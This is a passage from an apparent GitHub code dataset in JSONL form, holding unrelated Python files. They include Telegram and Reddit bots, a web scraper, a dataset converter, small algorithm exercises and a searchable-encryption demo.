Tr\n\n\ndef Adjust(i, S, Tr, pairing, n, pubk):\n mul_all = Element.one(pairing, G1)\n for j in S:\n if j != i:\n item = n + 1 - j + i\n element = pubk[item]\n mul_all = mul_all * element\n Tr_i = Tr * mul_all\n return Tr_i\n\n\ndef Test(Tr_i, i, S, elements, pairing, n, pubk):\n c1 = elements[0]\n c2 = elements[1]\n cws = elements[2]\n pub = Element.one(pairing, G1)\n for j in S:\n item = n + 1 - j\n element = pubk[item]\n pub = pub * element\n on = pairing.apply(Tr_i, c1)\n down = pairing.apply(pub, c2)\n right = Element.__ifloordiv__(on, down)\n for cw in cws:\n if cw == right:\n return True\n return False\n\n\nif __name__ == '__main__':\n qbits = 512\n rbits = 160\n # 签名组id集合\n G = [i for i in range(1, 10 + 1)]\n # 1.Setup():初始化\n pairing, g, n, pubk = Setup(qbits, rbits, len(G))\n print(pairing)\n # 2.DataOwner产生公私钥对\n keypair = Keygen(pairing, g)\n pk = keypair[0]\n msk = keypair[1]\n\n kagg = Extract(msk, G, pairing, n, pubk)\n N = [1, 2, 3, 4, 6]\n # 3.DataOwner根据其关键字和索引加密每个文档\n gid = 1\n encrypt = Encrypt(pk, gid, N, pairing, g, n, pubk)\n\n # 5.用户根据聚合密钥和关键字生成唯一的陷门\n for i in range(len(N)):\n pid = N[i]\n td_i = Trapdoor(kagg, pid, pairing)\n Tri = Adjust(gid, G, td_i, pairing, n, pubk)\n test = Test(Tri, gid, G, encrypt, pairing, n, pubk)\n print(test)\n","repo_name":"UbiPLab/DeTAPS","sub_path":"main/KASE.py","file_name":"KASE.py","file_ext":"py","file_size_in_byte":3066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43462477297","text":"import logging\nimport os\n\nfrom telegram import Update, InlineQueryResultArticle, InputTextMessageContent, \\\n InlineKeyboardMarkup, InlineKeyboardButton\nfrom telegram.ext import ApplicationBuilder, ContextTypes, CommandHandler, InlineQueryHandler, CallbackQueryHandler\nfrom dotenv import load_dotenv\n\nimport 
handle_list\n\nlogging.basicConfig(\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO\n)\n\n\nasync def start(update: Update, context: ContextTypes.DEFAULT_TYPE):\n await context.bot.send_message(\n chat_id=update.effective_chat.id,\n text=\"Your name is \" + update.effective_user.first_name + 'If you want to change it, use /name')\n\n\nasync def name_changer(update: Update, context: ContextTypes.DEFAULT_TYPE):\n await context.bot.send_message(\n chat_id=update.effective_chat.id,\n text=\"Your name is \" + update.effective_user.first_name + 'If you want to change it, I don\\'t care! I haven\\'t '\n 'implemented this part yet! XD')\n\n\nasync def inline_query(update: Update, context: ContextTypes.DEFAULT_TYPE):\n query = update.inline_query.query\n response_text = 'کی پایس برای ' + query\n keyboard = InlineKeyboardMarkup([[\n InlineKeyboardButton('پایم', callback_data='opt_in'),\n InlineKeyboardButton('نیستم :(', callback_data='opt_out')\n ]])\n results = [InlineQueryResultArticle(\n id=query,\n title='List for ' + query,\n input_message_content=InputTextMessageContent(response_text),\n reply_markup=keyboard\n )]\n\n await context.bot.answer_inline_query(update.inline_query.id, results)\n\n\nasync def button(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:\n query = update.callback_query\n option = query.data\n user = query.from_user.username\n logging.info(\"\\n\\n============================\")\n logging.info(query)\n logging.info(update.message)\n logging.info(update)\n logging.info(context.chat_data)\n logging.info(context.user_data)\n logging.info(context.chat_data)\n logging.info(\"============================\\n\\n\")\n\n current_members = handle_list.get_members(query.chat_instance, query.inline_message_id)\n if option == 'opt_in':\n if user in current_members:\n await context.bot.answer_callback_query(query.id, text=\"You\\'re already in!\", show_alert=True)\n return\n else:\n current_members += [user]\n\n else:\n if user not in current_members:\n await context.bot.answer_callback_query(query.id, text=\"You\\'re not even on the list!\", show_alert=True)\n return\n else:\n current_members.remove(user)\n\n handle_list.update_members(query.chat_instance, query.inline_message_id, current_members)\n\n message_text = 'لیست پایه‌ها:'\n for i, name in enumerate(current_members):\n message_text += f'\\n{i}- {name}'\n\n keyboard = InlineKeyboardMarkup([[\n InlineKeyboardButton('پایم', callback_data='opt_in'),\n InlineKeyboardButton('نیستم :(', callback_data='opt_out')\n ]])\n await query.edit_message_text(text=message_text, reply_markup=keyboard)\n\n\ndef setup_handlers():\n return [\n CommandHandler('start', start),\n CommandHandler('name', name_changer),\n CallbackQueryHandler(button),\n InlineQueryHandler(inline_query)\n ]\n\n\nif __name__ == '__main__':\n load_dotenv()\n application = ApplicationBuilder().token(os.getenv('TELEGRAM_BOT_TOKEN')).build()\n\n for handler in setup_handlers():\n application.add_handler(handler)\n\n application.run_polling()\n","repo_name":"SaeeSaadat/telegrambot_name_gatherer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1553931582","text":"from bs4 import BeautifulSoup\nimport requests\nfrom pymongo import MongoClient\n\n# connecting with mongodb\ncluster = MongoClient('your connection string')\n\n# giving cluster name\ndb = cluster[\"localBookData\"]\n\n# giving 
collection name\ncollection = db[\"allBookDetails\"]\n\ntotal_pages = 50\n\n# titles = ['Title', 'Rating', 'Price', 'Stock']\n\n\ndef individual_product(product_url, row):\n product_html_text = requests.get(f'https://books.toscrape.com/catalogue/{product_url}').content\n product_soup = BeautifulSoup(product_html_text, 'lxml')\n product_data = product_soup.find('article', class_='product_page')\n\n # extracting image url\n raw_img = product_data.find('img')['src']\n raw_img = raw_img.split('/')[2:]\n img = ''\n for char in raw_img:\n img = img + '/' + char\n img = 'https://books.toscrape.com' + img\n\n # extracting title\n title = product_data.find('div', class_='col-sm-6 product_main').h1.text\n\n # extracting price\n price = product_data.find('p',class_='price_color').text\n # print(price)\n\n # extracting rating\n rating = product_data.find('p','star-rating')['class'][1]\n\n # extracting description\n description = product_data.findAll('p')[3].text\n\n # extracting table content\n table = product_data.find('table' , class_='table table-striped').findAll('td')\n upc = table[0].text\n product_type = table[1].text\n price_excl_tax = table[2].text\n price_incl_tax = table[3].text\n tax = table[4].text\n availability = table[5].text\n num_reviews = table[6].text\n\n # print(row, upc, product_type, price_excl_tax, price_incl_tax, tax, availability, num_reviews)\n\n post = {\"_id\": row, \"upc\": upc, \"Title\": title, \"description\": description, \"Rating\": rating[-1], \"price\": price,\n \"stock\": availability, \"product_type\" : product_type, \"price_excl_tax\": price_excl_tax,\n \"price_incl_tax\": price_incl_tax, \"tax\": tax, \"num_reviews\": num_reviews}\n\n collection.insert_one(post)\n print(f'product {row} inserted into database')\n\n\nrow = 1\nfor page in range(total_pages):\n with open(f'./sampleWebpages/page-{page + 1}.html', 'rb') as html_file:\n content = html_file.read()\n\n soup = BeautifulSoup(content,'lxml')\n books_data = soup.findAll('article', class_='product_pod')\n\n\n for book in books_data:\n product_url = book.h3.a['href']\n\n\n # calling function to get individual product details\n individual_product(product_url,row)\n\n # print(product_url)\n row+=1\n print(f\"page number : {page+1} done\")\n\nprint(\"\\nALl Books with details uploaded to the database\")\n\n","repo_name":"Manoj-Kumar13/LearningWebScraping","sub_path":"individualProduct.py","file_name":"individualProduct.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73950346168","text":"import os\nimport cv2\nimport numpy as np\nimport argparse\nimport os.path as osp\nimport shutil\nimport simone_loader\nfrom loader_config import loader_cfg\n\n\nkitti_cls_type = dict( \n Pedestrian = 'Pedestrian',\n Car = 'Car',\n Rider = 'Cyclist',\n TrafficLight = 'Misc',\n Truck ='Truck',\n Bus = 'Van',\n SpecialVehicle = 'Misc',\n SpeedLimitSign = 'Misc',\n RoadObstacle = 'Misc'\n )\n\ndef get_index_str(idx):\n return '{:06d}'.format(idx)\n\ndef convert_rotation_to_kitti(rots):\n return -(rots+3.14/2)\n\ndef get_kitti_format_cls(cls_type):\n if cls_type in kitti_cls_type:\n return kitti_cls_type[cls_type]\n else:\n raise Exception('ERROR: HAS NO CORRESPONDING LABEL')\n\ndef save_kitti_format_label(annos, type_info, idx, file_tail, args):\n path = osp.join(args.output, type_info, idx+file_tail)\n fi = open(path,'w')\n for k in annos:\n bbox2d = annos[k]['bboxes2D']['bbox']\n size = annos[k]['bboxes3D']['size']\n loc = 
annos[k]['bboxes3D']['relativePos']\n rot = convert_rotation_to_kitti(annos[k]['bboxes3D']['relativeRot'][2])\n cls_type = get_kitti_format_cls(annos[k]['bboxes2D']['type'])\n line = cls_type + ' 0.0 0 {:.2f}'.format(rot)\n line += ' {:.2f} {:.2f} {:.2f} {:.2f}'.format(bbox2d[0], bbox2d[1], bbox2d[2], bbox2d[3])\n line += ' {:.2f} {:.2f} {:.2f}'.format(size[2], size[1], size[0])\n line += ' {:.2f} {:.2f} {:.2f} {:.2f}\\n'.format(-loc[1], -loc[2], loc[0], rot)\n fi.write(line)\n fi.close()\n\ndef save_kitti_format_calib(dump_settings, type_info, idx, file_tail, args):\n fx = dump_settings['camera']['fx']\n fy = dump_settings['camera']['fy']\n cx = dump_settings['camera']['cx']\n cy = dump_settings['camera']['cy']\n p0_line = 'P0: -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0\\n'\n p1_line = 'P1: -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0\\n'\n p2_line = 'P2: {:.2f} 0.0 {:.2f} 0.0 0.0 {:.2f} {:.2f} 0.0 0.0 0.0 1.0 0.0\\n'.format(fx, cx, fy, cy)\n print(p2_line)\n p3_line = '-10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0 -10.0\\n'\n r0_line = 'R0_rect: 1.0 0.0 0.0 0.0 1.0 0.0 0.0 0.0 1.0\\n'\n tr_velo2cam_line = 'Tr_velo_to_cam: 0.0 -1.0 0.0 0.0 0.0 0.0 -1.0 0.0 1.0 0.0 0.0 0.0\\n'\n tr_imu2velo_line = 'Tr_imu_to_velo: 0.0 -1.0 0.0 0.0 0.0 0.0 -1.0 0.0 1.0 0.0 0.0 0.0\\n'\n path = osp.join(args.output, type_info, idx+file_tail)\n fi = open(path, 'w')\n fi.write(p0_line+p1_line+p2_line+p3_line)\n fi.write(r0_line+tr_velo2cam_line+tr_imu2velo_line)\n fi.close()\n\ndef save_kitti_format_pcd(pcd, type_info, idx, file_tail, args):\n path = osp.join(args.output, type_info, idx+file_tail)\n pcd = pcd.reshape(-1)\n pcd.tofile(path)\n\ndef save_kitti_format_image_2(image, type_info, idx, file_tail, args):\n path = osp.join(args.output, type_info, idx+file_tail)\n cv2.imwrite(path, (image*255).astype(np.int32))\n\ndef make_save_dirs(args):\n if not os.path.exists(args.output):\n os.mkdir(args.output)\n path_type = ['image_2', 'label_2', 'velodyne', 'calib']\n for t in path_type:\n path = os.path.join(args.output, t)\n if os.path.exists(path):\n shutil.rmtree(path)\n os.mkdir(path)\n return\n \ndef gci(dataset_loader, args): \n make_save_dirs(args)\n count = 0\n stamp_num = dataset_loader.get_stamp_num()\n for i in range(stamp_num):\n idx_num = dataset_loader.get_idx_num()\n for j in range(idx_num):\n print(count, i, j)\n data_info = dataset_loader.next()\n idx_str = get_index_str(count)\n save_kitti_format_image_2(data_info['image'], 'image_2', idx_str, '.png', args)\n save_kitti_format_pcd(data_info['pointcloud'], 'velodyne', idx_str, '.bin', args)\n save_kitti_format_calib(data_info['dump_settings'], 'calib', idx_str, '.txt', args)\n save_kitti_format_label(data_info['fusion_annos'], 'label_2', idx_str, '.txt', args)\n count += 1\n return \n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n print('Usage: simone2kitti.py --input=inputpath --output=outpath')\n parser.add_argument('--input', default=loader_cfg.DATASET_DIR, required=False,\n help='a path input file')\n parser.add_argument('--output', default='/media/jhli/57DF22050921ED01/exchange/dl_dataset/fusion/temp', required=False,\n help='a path out file')\n args = parser.parse_args()\n dataset_loader = simone_loader.SimoneDatasetLoader(args.input, loader_cfg.TESTING_LOADER_FLAGS, True)\n gci(dataset_loader, 
args)","repo_name":"51WORLD/SyntheticDataset","sub_path":"user_tools/simone_loader/simone2kitti.py","file_name":"simone2kitti.py","file_ext":"py","file_size_in_byte":4831,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"77"} +{"seq_id":"26519353632","text":"from datetime import *\nfrom pytz import *\nfrom telegram import *\nfrom telegram.ext import *\n\nbirthdays = {\n \"26-01\":[\"Jay\", \"Jack\"],\n \"29-06\": [\"Jill\",\"John\"],\n \"06-06\": [\"Sam\", \"Samantha\"]\n}\n\ntoday = datetime.now(timezone('Asia/kolkata'))\ntoday_string = today.strftime(\"%d-%m\")\n\nAPI_Key = \"\"\nCHAT_ID = \"\"\n\nbot = Bot(API_Key)\nupdater = Updater(API_Key, use_context=True)\nupdater.start_polling()\n\nif today_string in birthdays:\n message = \"Birthday Notification\\n\"\n for i in birthdays[today_string]:\n message += i +'\\n'\n print(message)\n bot.send_message(\n chat_id = CHAT_ID,\n text = message\n )\nelse:\n message = \"No birthdays today.\"\n bot.send_message(\n chat_id = CHAT_ID,\n text = message\n )\nupdater.stop()\n","repo_name":"jaygandhi129/PythonTelegramBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28456973969","text":"#!/usr/bin/python\r\n\r\nwith open(\"AOC8.txt\", \"r\") as file:\r\n data = file.read().replace(\"\\n\", \",\")\r\nmylist = data.split(\",\")\r\n\r\ninstruction = []\r\nvalue = []\r\nacc = 0\r\n\r\nfor k in mylist:\r\n\tk = k.split(\" \")\r\n\tinstruction.append(k[0])\r\n\tvalue.append(k[1])\r\n\r\nstep=[]\r\ni=1\r\n\r\nwhile not i in step:\r\n\tstep.append(i)\r\n\tif instruction[i-1] == \"nop\":\r\n\t\ti +=1\r\n\telif instruction[i-1] == \"acc\":\r\n\t\tacc += int(value[i-1])\r\n\t\ti +=1\r\n\telse: \r\n\t\ti += int(value[i-1])\r\n\r\nprint(acc)","repo_name":"neuberpe/AOC2020","sub_path":"AOC8_20.py","file_name":"AOC8_20.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"29393648229","text":"def levenshtein(palabra1, palabra2):\n m = len(palabra1)\n n = len(palabra2)\n\n # Crear una matriz de tamaño (m+1) x (n+1) e inicializar los valores\n matriz = [[0] * (n + 1) for _ in range(m + 1)]\n for i in range(m + 1):\n matriz[i][0] = i\n for j in range(n + 1):\n matriz[0][j] = j\n\n # Calcular la distancia de Levenshtein\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if palabra1[i - 1] == palabra2[j - 1]:\n matriz[i][j] = matriz[i - 1][j - 1]\n else:\n matriz[i][j] = min(matriz[i - 1][j - 1], matriz[i - 1][j], matriz[i][j - 1]) + 1\n\n # Determinar el tipo de distancia y retornar el string correspondiente\n distancia = matriz[m][n]\n if distancia > 1:\n return \"+1\"\n elif distancia == 1:\n if m > n:\n return \"IB\"\n elif m < n:\n return \"IB\"\n else:\n return \"1S\"\n else:\n return \"0D\"\n\nif __name__ == \"__main__\":\n palabra1 = \"gato\"\n palabra2 = \"gatito\"\n resultado = levenshtein(palabra1, palabra2)\n print(resultado)\n","repo_name":"pabloschwarzenberg/grader","sub_path":"tema10_ej2/tema10_ej2_0efe3d93feb6175300badf9df4e5b0ac.py","file_name":"tema10_ej2_0efe3d93feb6175300badf9df4e5b0ac.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9908060253","text":"# AUTOSCRIPT NAME: EX2_POSTATUS\n# CREATEDDATE: 2013-10-07 09:45:02\n# CREATEDBY: UFQJ\n# 
CHANGEDATE: 2014-05-25 19:04:31\n# CHANGEBY: UFQJ\n# SCRIPTLANGUAGE: jython\n# STATUS: Active\n\n# set PO revision date/time based on status change to PROCESSED.\n#\nfrom java.util import Calendar\nfrom java.util import Date\nfrom psdi.mbo import MboConstants\n \nif mbo.getString(\"status\") == \"PROCESSED\":\n # Use the Calendar to get the current Date/Time\n c = Calendar.getInstance()\n c.add(Calendar.SECOND,0)\n\n # now set order date or revision date, depending on whether rev num is zero\n if mbo.getInt(\"revisionnum\") == 0:\n mbo.setValue(\"ORDERDATE\", c.getTime(),MboConstants.NOACCESSCHECK)\n else:\n mbo.setValue(\"EX2POREVDATE\", c.getTime(),MboConstants.NOACCESSCHECK)","repo_name":"git786hub/Dynatrace_python","sub_path":"src/EX2_POSTATUS.py","file_name":"EX2_POSTATUS.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43356851762","text":"import requests\nfrom bs4 import BeautifulSoup as bs\nfrom fuzzywuzzy import fuzz\nfrom fuzzywuzzy import process\nimport praw\nimport re\nimport time\nimport os\nimport logging\nimport logging.config\n\n# Logging allows replacing print statements to show more information\n# This config outputs human-readable time, the log level, the log message and the line number this originated from\nlogging.basicConfig(\n format='%(asctime)s (%(levelname)s) %(message)s (Line %(lineno)d)', level=logging.DEBUG)\n\n# PRAW seems to have its own logging which clutters up console output, so this disables everything but Python's logging\nlogging.config.dictConfig({\n 'version': 1,\n 'disable_existing_loggers': True\n})\n\n\npassmark_page = 'https://www.cpubenchmark.net/cpu_list.php'\ngithub_link = 'https://github.com/Pixxel123/PCSX2-CPU-Bot'\nlatest_build = 'https://buildbot.orphis.net/pcsx2/'\npcsx2_page = 'https://pcsx2.net/getting-started.html'\n\nstr_minimum = 1600\nstr_recommended = 2100\n\nsummon_phrase = 'CPUBot! '\n\n\ndef bot_login():\n logging.info('Authenticating...')\n reddit = praw.Reddit(\n client_id=os.getenv('reddit_client_id'),\n client_secret=os.getenv('reddit_client_secret'),\n password=os.getenv('reddit_password'),\n user_agent=os.getenv('reddit_user_agent'),\n username=os.getenv('reddit_username'))\n logging.info(f\"Authenticated as {reddit.user.me()}\")\n return reddit\n\n\ndef get_cpu_info(cpu_search):\n choices = []\n lookup_page = requests.get(passmark_page)\n html = bs(lookup_page.content, 'lxml')\n cpu_table = html.find('table', id='cputable').find('tbody')\n for row in cpu_table.find_all(\"tr\")[1:]: # skip header row\n cells = row.find_all('td')\n cpu_name = cells[0].text\n cpu_details_link = cells[0].contents[0].attrs['href']\n # ! 
token_set_ratio ignores word order and duplicated words\n # cpu_name and cpu_search are set to lowercase and whitespace is stripped\n match_criteria = fuzz.token_set_ratio(\n clean_input(cpu_name), clean_input(cpu_search))\n # * show all matching criteria for debugging purposes\n # logging.debug(f\"{cpu_name}: {match_criteria}\")\n if match_criteria >= 50:\n choices.append({'cpu': cpu_name, 'link': cpu_details_link})\n # * show match values for debugging purposes\n # logging.debug(f\"{cpu_name}: {match_criteria}\")\n # score_cutoff value set to lessen false positives\n cpu_closest_match = process.extractOne(\n cpu_search, choices, scorer=fuzz.token_set_ratio, score_cutoff=95)\n cpu_details_link = cpu_closest_match[0]['link']\n cpu_closest_name = cpu_closest_match[0]['cpu']\n # show output in console\n logging.info(f\"Searching for {cpu_search}: Found: {cpu_closest_match}\")\n cpu_details_page = requests.get(\n f\"https://www.cpubenchmark.net/{cpu_details_link.replace('cpu_lookup', 'cpu')}\")\n cpu_page = bs(cpu_details_page.content, 'lxml')\n detail_pane = cpu_page.find('div', class_='right-desc')\n single_thread_rating = detail_pane.find('strong').nextSibling\n # ! cpu_sample_size is not used as it adds no real information to the user, but the scraping for it took some work\n # ! so this is left here for reference.\n # cpu_sample_size = detail_pane.find_all(\n # 'strong')[1].nextSibling.replace('*', '')\n # cpu_error_margin = detail_pane.find_all('span')[2].text\n return (cpu_closest_name, single_thread_rating, cpu_details_page.url)\n\n\ndef clean_input(input_string):\n try:\n # remove CPU frequency value\n frequency_strip = re.search(\n r\"(\\s?@?\\s?)(\\d\\.\\d{1,2})(ghz)?.*$\", input_string, re.IGNORECASE).group(0)\n except AttributeError:\n # if no frequency values to remove, set input to clean_string\n clean_string = input_string\n else:\n clean_string = input_string.split(frequency_strip, 1)[0]\n clean_string = clean_string.lower()\n clean_string = clean_string.replace(' ', '')\n clean_string = clean_string.replace('-', '')\n # * debugging message\n # logging.debug(f\"{input_string} becomes {clean_string}\")\n return clean_string\n\n\ndef bot_message(cpu_lookup):\n try:\n cpu_info = get_cpu_info(cpu_lookup)\n cpu_model = cpu_info[0]\n cpu_str_rating = cpu_info[1]\n # ! cpu_sample_size removed due to not being needed by end user\n # sample_size = cpu_info[2]\n # ! Error margin output removed due to information not being necessary\n # ! 
CPU page link appended to STR rating\n # error_margin = cpu_info[3]\n details_page = cpu_info[2]\n messages = {'minimum': 'Below minimum specs for PCSX2.',\n 'above_minimum': 'Above minimum specs, but still under the recommended specs for PCSX2.',\n 'recommended': 'At recommended specs for PCSX2.',\n 'above_recommended': 'Above recommended specs for PCSX2.'}\n if int(cpu_str_rating) < str_minimum:\n user_specs = messages['minimum']\n elif str_minimum < int(cpu_str_rating) < str_recommended:\n user_specs = messages['above_minimum']\n elif int(cpu_str_rating) == str_recommended:\n user_specs = messages['recommended']\n elif int(cpu_str_rating) > str_recommended:\n user_specs = messages['above_recommended']\n bot_reply = f\"**CPU model:** {cpu_model}\\n\\n **CPU STR:** [{cpu_str_rating} (CPU Benchmark Page)]({details_page})\\n\\n **PCSX2 specs:** {user_specs}\\n\\n [Single Thread Rating **Minimum:** {str_minimum} | **Recommended:** {str_recommended} (PCSX2 Requirements Page)]({pcsx2_page})\"\n bot_reply += f\"\\n\\n The latest version of PCSX2 can be found [HERE]({latest_build})\"\n except TypeError:\n # reply if CPU information is not found\n bot_reply = f\"Sorry, I couldn't find any information on {cpu_lookup}.\\n\\n If it's not on [PassMark's CPU Benchmarks list]({passmark_page}), I won't be able to return a result; or perhaps you have a misspelling, in which case, feel free to reply to this with `CPUBot! ` and I'll try again!\"\n pass\n bot_reply += f\"\\n\\n---\\n\\n^(I'm a bot, and should only be used for reference (might also make mistakes sometimes, in which case adding a brand name like Intel or AMD could help! I also don't need to know the GHz of your CPU, just the model is enough!)^) ^(if there are any issues, please contact my) ^[Creator](https://www.reddit.com/message/compose/?to=theoriginal123123&subject=/u/PCSX2-CPU-Bot) \\n\\n[^GitHub]({github_link})\"\n return bot_reply\n\n\ndef run_bot():\n try:\n logging.info('Bot started!')\n # look for summon_phrase and reply\n for comment in subreddit.stream.comments():\n # allows bot command to NOT be case-sensitive and ignores comments made by the bot\n if summon_phrase.lower() in comment.body.lower() and comment.author.name != reddit.user.me():\n if not comment.saved:\n # regex allows cpubot to be called in the middle of most sentences\n cpu_lookup = re.search(\n f\"({summon_phrase})([^!,?\\n\\r]*)\", comment.body, re.IGNORECASE)\n if cpu_lookup:\n cpu_lookup = cpu_lookup.group(2)\n comment.reply(bot_message(cpu_lookup))\n comment = reddit.comment(id=f\"{comment.id}\")\n # Note: the Reddit API has a 1000 item limit on viewing things, so after 1000 saves, the ones prior (999 and back) will not be visible,\n # but reddit will still keep them saved.\n # If you are just checking that an item is saved, there is no limit.\n # However, saving an item takes an extra API call which can slow down a high-traffic bot.\n comment.save()\n logging.info('Comment posted!')\n except Exception as error:\n # saves comment where CPU info cannot be found so bot is not triggered again\n comment.save()\n # dealing with low karma posting restriction\n # bot will use rate limit error to decide how long to sleep for\n time_remaining = 15\n error_message = str(error).split()\n if (error_message[0] == 'RATELIMIT:'):\n units = ['minute', 'minutes']\n # split rate limit warning to grab amount of time\n for i in error_message:\n if (i.isdigit()):\n # check if time units are present in string\n for unit in units:\n if unit in error_message:\n # if minutes, convert to 
seconds for sleep\n time_remaining = int(i) * 60\n else:\n # if seconds, use directly for sleep\n time_remaining = int(i)\n break\n break\n # display error type and string\n logging.exception(repr(error))\n # loops backwards through seconds remaining before retry\n for i in range(time_remaining, 0, -5):\n logging.info(f\"Retrying in {i} seconds...\")\n time.sleep(5)\n\n\nif __name__ == '__main__':\n while True:\n logging.info('Bot starting...')\n try:\n reddit = bot_login()\n # uses environment variable to detect whether in Heroku\n if 'DYNO' in os.environ:\n subreddit = reddit.subreddit('pcsx2')\n else:\n # if working locally, use .env files\n import dotenv\n dotenv.load_dotenv()\n subreddit = reddit.subreddit('cpubottest')\n run_bot()\n except Exception as error:\n logging.exception(repr(error))\n time.sleep(20)\n","repo_name":"Pixxel123/PCSX2-CPU-Bot","sub_path":"cpu_benchmark_scraper.py","file_name":"cpu_benchmark_scraper.py","file_ext":"py","file_size_in_byte":9845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1911464925","text":"#!/usr/bin/env python3\n\"\"\" The file src/listing.txt contains a list of files with one line per file. Each line contains seven fields: access rights, number of references, owner’s name, name of owning group, file size, date, filename. These fields are separated with one or more spaces. Note that there may be spaces also within these seven fields.\n\nWrite function file_listing that loads the file src/listing.txt. It should return a list of tuples (size, month, day, hour, minute, filename). Use regular expressions to do this (either match, search, findall, or finditer method).\n\nAn example: for line\n\n-rw-r--r-- 1 jttoivon hyad-all 25399 Nov 2 21:25 exception_hierarchy.pdf\nthe function should create the tuple (25399, \"Nov\", 2, 21, 25, \"exception_hierarchy.pdf\"). 
\"\"\"\n\n\nimport re\n\n\n#def file_listing(filename=\"src/listing.txt\"):\ndef file_listing(filename=\"src/listing.txt\"):\n pat3 = \"[\\d]+\\s[A-Z][a-z]+\\s.\\d+\\s\\d+:\\d+\\s[\\w._-]+\"\n resultant = []\n f = open(filename)\n line = f.readline()\n \n while line:\n #print (lyn)\n result = re.findall(pat3,line)\n for word in result:\n L,final = [],[]\n L = word.split()\n\n a,b,c = int(L[0]), L[1], int(L[2])\n time = L[3].split(\":\")\n d,e = int(time[0]), int(time[1])\n final.append(a)\n final.append(b)\n final.append(c)\n final.append(d)\n final.append(e)\n final.append(L[4])\n #print(final)\n resultant.append(final)\n \n line = f.readline()\n f.close()\n return resultant\n \n \n\ndef main():\n filename = \"src/listing.txt\"\n \n print(file_listing(filename))\n \n\nif __name__ == \"__main__\":\n main()\n\n\n\n\"\"\"\n #name = re.findall(r\"([^\\b- ][\\d]+| [A-Z][a-z]+|[aA-zZ]*\\.[a-z]+)\",txt)\n #trial2 = re.findall(r\"([^\\b- :][\\d]+|[A-Z][a-z]+|[aA-zZ]*\\.[a-z]+)\",txt)\n #trial3= re.findall(r\"([^\\b- :][\\d]+|([A-Z][a-z][a-z]| [\\d])+|[a-z_]*\\.[a-z]+)\",txt)\n #listing = (re.findall(r\"([\\d]{2,}|[\\s]+[A-Za-z]+\\.[a-z]+)\",txt))\n \n\"\"\"","repo_name":"vins-stha/hy-data-analysis-with-python","sub_path":"part02-e02_file_listing/src/file_listing.py","file_name":"file_listing.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"14705903793","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 24 15:57:07 2018\n\n@author: beccers\n\"\"\"\n\n# Rebecca Olson\n# Homework 7, Problem 3a\n\n# this function inputs an nxn matrix \"Ainput\" and\n# performs LU decomposition, outputing an upper triangular matrix, U, \n# and a lower triangular matrix of the multiplicative factors, L\ndef LUdecomp(Ainput):\n n=len(Ainput)\n U = Ainput.copy() # make copies so as not to write over originals\n L = Ainput.copy() # make copies so as not to write over originals\n for i in range(0, n):\n # loop over row to be zero'ed from row j+1 to n (j+1 to n-1)\n for j in range(i+1, n):\n c = U[j,i]/U[i,i] # multiplicative factor to zero point\n L[j,i] = c\n U[j,i] = 0.0 # we know this element goes to zero\n U[j,i+1:n]=U[j,i+1:n]-c*U[i,i+1:n] # do subtraction of two rows\n L[i,j] = 0.0\n L[i,i] = 1.0\n return (L,U) # return modified form of A\n# only requires a forward- and back-substitution for each b, once the matrix A has been decomposed","repo_name":"Becca-O/Matrix-Conditioning_Gaussian-Elimination-and-Eigenvalue-Problems","sub_path":"HW7p3a.py","file_name":"HW7p3a.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38530916487","text":"import os\n\nfrom jinja2 import Template\nfrom IPython.core.display import display, HTML\n\nCURRENT_PATH = os.path.abspath(os.path.dirname(__file__))\n\n\nclass RenderEngine:\n def __init__(self, tmpl_file: str = \"templates/jupyter_notebook.html\"):\n tmpl_file = os.path.join(CURRENT_PATH, tmpl_file)\n self.tmpl_file = tmpl_file\n\n def render_notebook(self):\n if hasattr(self, \"render_to_tmpl\"):\n self.render_to_tmpl()\n\n with open(self.tmpl_file) as f:\n tmpl_file = f.read()\n tmpl = Template(tmpl_file)\n\n output = tmpl.render(chart=self)\n return display(HTML(output))\n\n show = 
